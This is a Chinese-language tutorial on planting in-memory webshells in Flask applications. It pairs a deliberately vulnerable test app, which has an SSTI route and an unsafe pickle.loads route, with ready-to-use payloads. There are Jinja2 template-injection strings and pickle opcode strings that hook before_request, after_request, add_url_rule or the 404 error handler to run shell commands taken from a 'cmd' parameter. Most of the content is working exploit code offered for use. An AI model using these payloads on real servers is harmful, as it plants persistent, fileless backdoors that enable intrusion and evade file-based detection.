Flask内存马

测试代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from flask import Flask, request, render_template_string
import pickle
import base64

app = Flask(__name__)

@app.route("/")
def index():
return "here is index"

@app.route("/ssti")
def ssti():
s = request.args.get('in', default='default')
t = '''
<html>
%s
</html>
''' % s
return render_template_string(t)

@app.route("/pickle")
def pic():
s = base64.b64decode(request.args.get("in", default=""))
pickle.loads(s)
return "success!"


if __name__ == "__main__":
app.run(host='0.0.0.0', port=8888, debug=True)

利用点

@app.route()

app.add_url_rule用于添加路由

1
2
3
4
5
6
7
8
9
# rule: 路由; view_func: 视图函数
def add_url_rule(
self,
rule: str,
endpoint: str | None = None,
view_func: ft.RouteCallable | None = None,
provide_automatic_options: bool | None = None,
**options: t.Any,
)

现版本似乎已不可用

@app.before_request

before_request 方法允许我们在每个请求之前执行一些操作。我们可以利用这个方法来进行身份验证、请求参数的预处理等任务。

1
2
# f: 注册的函数
self.before_request_funcs.setdefault(None, []).append(f)

用这个方法构造内存马的坏处是服务后续操作都无法进行。

@app.after_request

after_request 方法允许我们在每个请求之后执行一些操作。我们可以利用这个方法来添加一些响应头、记录请求日志等任务。

1
2
# f: 注册的函数
self.after_request_funcs.setdefault(None, []).append(f)

为了不影响原来的web服务,这里编写一个函数,函数需要传入一个response再返回一个response,构造以下函数

1
2
3
4
5
6
7
8
lambda resp: #传入参数
CmdResp if request.args.get('cmd') and #如果请求参数含有cmd则返回命令执行结果
exec('
global CmdResp; #定义一个全局变量,方便获取
CmdResp=make_response(os.popen(request.args.get(\'cmd\')).read()) #创建一个响应对象
')==None #恒真
else resp) #如果请求参数没有cmd则正常返回
#这里的cmd参数名和CmdResp变量名都是可以改的,最好改成服务中不存在的变量名以免影响正常业务

如果不需要考虑原服务可以仿照before_request的方法编写payload

@app.teardown_request

在 Flask 中,每次接收到一个请求并处理完毕后,都会调用 teardown_request() 函数。这个函数可以被开发人员用来释放请求过程中分配的资源或执行其他清理操作。通常,它用于一些与请求生命周期相关的操作,例如关闭数据库连接、释放文件句柄等。

1
2
# f: 注册的函数
self.teardown_request_funcs.setdefault(None, []).append(f)

可以用来实现无回显RCE

@app.errorhandler

Register a function to handle errors by code or exception class.

因为register_error_handler无法直接使用所以使用error_handler_spec

1
2
3
4
5
6
7
8
errorhandler -> self.register_error_handler(code_or_exception, f)
def register_error_handler(
self,
code_or_exception: type[Exception] | int,
f: ft.ErrorHandlerCallable,
) -> None:
exc_class, code = self._get_exc_class_and_code(code_or_exception)
self.error_handler_spec[None][code][exc_class] = f

传入的handler需要接受一个error

获取app

1
2
3
app
flask.current_app
__import__('sys').modules['__main__'].__dict__['app']

SSTI

add_url_rule

1
{{url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})}}

这里_request_ctx_stack换成直接用request应该也可以,但是现版本测不了

before_request_funcs.setdefault

RCEpayload

1
2
3
4
5
# current_app
{{url_for.__globals__['__builtins__']['eval']("app.before_request_funcs.setdefault(None,[]).append(lambda :__import__('os').popen('whoami').read())", {'app':url_for.__globals__['current_app']})}}

# app
{{url_for.__globals__['__builtins__']['eval']("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(lambda :__import__('os').popen('whoami').read())")}}

webshell /?cmd=

1
{{url_for.__globals__['__builtins__']['eval']("app.before_request_funcs.setdefault(None,[]).append(lambda :__import__('os').popen(request.args.get('cmd', 'whoami')).read())", {'request':url_for.__globals__['request'],'app':url_for.__globals__['current_app']})}}

after_request_funcs.setdefault

webshell /?cmd=

1
{{url_for.__globals__['__builtins__']['eval']("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__('flask').make_response(__import__('os').popen(request.args.get('cmd')).read())\")==None else resp)",{'request':url_for.__globals__['request'],'app':url_for.__globals__['current_app']})}}

payload2

1
{{url_for.__globals__['__builtins__']['eval']("__import__('flask').current_app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if __import__('flask').request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__('flask').make_response(__import__('os').popen(__import__('flask').request.args.get('cmd')).read())\")==None else resp)")}}

error_handler_spec

404webshell /404page?cmd=

1
{{url_for.__globals__['__builtins__']['exec']("exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda e:__import__('os').popen(request.args.get('cmd', 'whoami')).read()", {'request':url_for.__globals__['request'],'app':url_for.__globals__['current_app']})}}

Pickle反序列化

before_request_funcs.setdefault

webshell /?cmd=

1
2
3
4
opcode = b'''(c__builtin__
eval
Vapp.before_request_funcs.setdefault(None,[]).append(lambda :__import__('os').popen(request.args.get('cmd', 'whoami')).read())
o.'''

after_request_funcs.setdefault

webshell /?cmd=

1
2
3
4
opcode = b'''(c__builtin__
eval
V__import__('sys').modules['__main__'].__dict__['app'].after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec("global CmdResp;CmdResp=__import__('flask').make_response(__import__('os').popen(request.args.get('cmd')).read())")==None else resp)
o.'''

error_handler_spec

404webshell /404page?cmd=

1
2
3
4
opcode = b'''(c__builtin__
exec
Vexc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda e:__import__('os').popen(request.args.get('cmd', 'whoami')).read()
o.'''

参考文章: